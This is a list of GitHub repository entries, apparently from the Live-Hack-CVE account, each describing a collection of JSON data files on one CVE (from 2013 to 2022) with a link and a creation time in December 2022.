**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44741 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44741](https://github.com/Live-Hack-CVE/CVE-2022-44741) create time: 2022-12-23T21:54:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41136](https://github.com/Live-Hack-CVE/CVE-2022-41136) create time: 2022-12-23T21:54:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20448](https://github.com/Live-Hack-CVE/CVE-2022-20448) create time: 2022-12-23T21:54:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41980 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41980](https://github.com/Live-Hack-CVE/CVE-2022-41980) create time: 2022-12-23T21:54:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-42494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-42494](https://github.com/Live-Hack-CVE/CVE-2022-42494) create time: 2022-12-23T21:54:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43481](https://github.com/Live-Hack-CVE/CVE-2022-43481) create time: 2022-12-23T21:54:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43491](https://github.com/Live-Hack-CVE/CVE-2022-43491) create time: 2022-12-23T21:54:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40632](https://github.com/Live-Hack-CVE/CVE-2022-40632) create time: 2022-12-23T21:54:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40223](https://github.com/Live-Hack-CVE/CVE-2022-40223) create time: 2022-12-23T21:54:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40206](https://github.com/Live-Hack-CVE/CVE-2022-40206) create time: 2022-12-23T21:54:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40205 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40205](https://github.com/Live-Hack-CVE/CVE-2022-40205) create time: 2022-12-23T21:54:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30545 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30545](https://github.com/Live-Hack-CVE/CVE-2022-30545) create time: 2022-12-23T21:54:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27914](https://github.com/Live-Hack-CVE/CVE-2022-27914) create time: 2022-12-23T21:54:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27858 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27858](https://github.com/Live-Hack-CVE/CVE-2022-27858) create time: 2022-12-23T21:54:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27855 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27855](https://github.com/Live-Hack-CVE/CVE-2022-27855) create time: 2022-12-23T21:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44556](https://github.com/Live-Hack-CVE/CVE-2022-44556) create time: 2022-12-23T21:54:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6646](https://github.com/Live-Hack-CVE/CVE-2013-6646) create time: 2022-12-23T21:03:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6645 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6645](https://github.com/Live-Hack-CVE/CVE-2013-6645) create time: 2022-12-23T21:03:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6641](https://github.com/Live-Hack-CVE/CVE-2013-6641) create time: 2022-12-23T21:03:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-6644 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-6644](https://github.com/Live-Hack-CVE/CVE-2013-6644) create time: 2022-12-23T21:03:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1735](https://github.com/Live-Hack-CVE/CVE-2014-1735) create time: 2022-12-23T21:06:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1705](https://github.com/Live-Hack-CVE/CVE-2014-1705) create time: 2022-12-23T21:06:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1714 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1714](https://github.com/Live-Hack-CVE/CVE-2014-1714) create time: 2022-12-23T21:06:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1713 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1713](https://github.com/Live-Hack-CVE/CVE-2014-1713) create time: 2022-12-23T21:06:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1715 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1715](https://github.com/Live-Hack-CVE/CVE-2014-1715) create time: 2022-12-23T21:06:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1736](https://github.com/Live-Hack-CVE/CVE-2014-1736) create time: 2022-12-23T21:05:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1734 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1734](https://github.com/Live-Hack-CVE/CVE-2014-1734) create time: 2022-12-23T21:05:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-3166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-3166](https://github.com/Live-Hack-CVE/CVE-2014-3166) create time: 2022-12-23T21:05:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1731](https://github.com/Live-Hack-CVE/CVE-2014-1731) create time: 2022-12-23T21:05:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1730 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1730](https://github.com/Live-Hack-CVE/CVE-2014-1730) create time: 2022-12-23T21:05:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1733](https://github.com/Live-Hack-CVE/CVE-2014-1733) create time: 2022-12-23T21:04:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-1732 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-1732](https://github.com/Live-Hack-CVE/CVE-2014-1732) create time: 2022-12-23T21:04:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-2031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-2031](https://github.com/Live-Hack-CVE/CVE-2016-2031) create time: 2022-12-23T21:11:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-1019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-1019](https://github.com/Live-Hack-CVE/CVE-2016-1019) create time: 2022-12-23T21:03:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4283 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4283](https://github.com/Live-Hack-CVE/CVE-2016-4283) create time: 2022-12-23T21:03:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4284](https://github.com/Live-Hack-CVE/CVE-2016-4284) create time: 2022-12-23T21:03:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4280](https://github.com/Live-Hack-CVE/CVE-2016-4280) create time: 2022-12-23T20:33:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4281](https://github.com/Live-Hack-CVE/CVE-2016-4281) create time: 2022-12-23T20:33:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4282 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4282](https://github.com/Live-Hack-CVE/CVE-2016-4282) create time: 2022-12-23T20:33:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4287](https://github.com/Live-Hack-CVE/CVE-2016-4287) create time: 2022-12-23T20:33:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4277](https://github.com/Live-Hack-CVE/CVE-2016-4277) create time: 2022-12-23T20:33:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6924 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6924](https://github.com/Live-Hack-CVE/CVE-2016-6924) create time: 2022-12-23T20:32:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4275](https://github.com/Live-Hack-CVE/CVE-2016-4275) create time: 2022-12-23T20:24:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4276 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4276](https://github.com/Live-Hack-CVE/CVE-2016-4276) create time: 2022-12-23T20:24:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4271 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4271](https://github.com/Live-Hack-CVE/CVE-2016-4271) create time: 2022-12-23T20:24:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4274](https://github.com/Live-Hack-CVE/CVE-2016-4274) create time: 2022-12-23T20:24:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6922](https://github.com/Live-Hack-CVE/CVE-2016-6922) create time: 2022-12-23T20:24:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-11683 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-11683](https://github.com/Live-Hack-CVE/CVE-2017-11683) create time: 2022-12-23T21:05:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-12207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-12207](https://github.com/Live-Hack-CVE/CVE-2018-12207) create time: 2022-12-23T20:30:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-6891 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-6891](https://github.com/Live-Hack-CVE/CVE-2018-6891) create time: 2022-12-23T20:29:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14591 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14591](https://github.com/Live-Hack-CVE/CVE-2019-14591) create time: 2022-12-23T21:14:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14590](https://github.com/Live-Hack-CVE/CVE-2019-14590) create time: 2022-12-23T21:14:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14574](https://github.com/Live-Hack-CVE/CVE-2019-14574) create time: 2022-12-23T21:14:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11113](https://github.com/Live-Hack-CVE/CVE-2019-11113) create time: 2022-12-23T21:14:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11111 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11111](https://github.com/Live-Hack-CVE/CVE-2019-11111) create time: 2022-12-23T21:14:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11089 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11089](https://github.com/Live-Hack-CVE/CVE-2019-11089) create time: 2022-12-23T21:14:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3886 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3886](https://github.com/Live-Hack-CVE/CVE-2019-3886) create time: 2022-12-23T21:12:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-2729 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-2729](https://github.com/Live-Hack-CVE/CVE-2019-2729) create time: 2022-12-23T21:12:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3693](https://github.com/Live-Hack-CVE/CVE-2019-3693) create time: 2022-12-23T21:11:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-18898 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-18898](https://github.com/Live-Hack-CVE/CVE-2019-18898) create time: 2022-12-23T21:11:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20434 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20434](https://github.com/Live-Hack-CVE/CVE-2019-20434) create time: 2022-12-23T21:11:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-3694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-3694](https://github.com/Live-Hack-CVE/CVE-2019-3694) create time: 2022-12-23T21:11:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20435 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20435](https://github.com/Live-Hack-CVE/CVE-2019-20435) create time: 2022-12-23T21:11:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20437](https://github.com/Live-Hack-CVE/CVE-2019-20437) create time: 2022-12-23T21:11:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20436](https://github.com/Live-Hack-CVE/CVE-2019-20436) create time: 2022-12-23T21:11:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20439](https://github.com/Live-Hack-CVE/CVE-2019-20439) create time: 2022-12-23T21:11:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-11139 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-11139](https://github.com/Live-Hack-CVE/CVE-2019-11139) create time: 2022-12-23T20:30:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10770 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10770](https://github.com/Live-Hack-CVE/CVE-2020-10770) create time: 2022-12-23T21:12:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15500](https://github.com/Live-Hack-CVE/CVE-2020-15500) create time: 2022-12-23T21:12:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7246 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7246](https://github.com/Live-Hack-CVE/CVE-2020-7246) create time: 2022-12-23T21:12:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25711 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25711](https://github.com/Live-Hack-CVE/CVE-2020-25711) create time: 2022-12-23T21:11:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19716 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19716](https://github.com/Live-Hack-CVE/CVE-2020-19716) create time: 2022-12-23T21:04:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14330 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14330](https://github.com/Live-Hack-CVE/CVE-2020-14330) create time: 2022-12-23T20:30:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10735](https://github.com/Live-Hack-CVE/CVE-2020-10735) create time: 2022-12-23T20:28:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11762 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11762](https://github.com/Live-Hack-CVE/CVE-2020-11762) create time: 2022-12-23T20:26:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11759 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11759](https://github.com/Live-Hack-CVE/CVE-2020-11759) create time: 2022-12-23T20:26:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12672 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12672](https://github.com/Live-Hack-CVE/CVE-2020-12672) create time: 2022-12-23T20:26:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11761 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11761](https://github.com/Live-Hack-CVE/CVE-2020-11761) create time: 2022-12-23T20:26:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12762 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12762](https://github.com/Live-Hack-CVE/CVE-2020-12762) create time: 2022-12-23T20:24:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12888](https://github.com/Live-Hack-CVE/CVE-2020-12888) create time: 2022-12-23T20:24:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11760 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11760](https://github.com/Live-Hack-CVE/CVE-2020-11760) create time: 2022-12-23T20:24:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11764 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11764](https://github.com/Live-Hack-CVE/CVE-2020-11764) create time: 2022-12-23T20:24:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11763 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11763](https://github.com/Live-Hack-CVE/CVE-2020-11763) create time: 2022-12-23T20:24:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13614](https://github.com/Live-Hack-CVE/CVE-2020-13614) create time: 2022-12-23T20:24:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7608 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7608](https://github.com/Live-Hack-CVE/CVE-2020-7608) create time: 2022-12-23T20:22:13Z

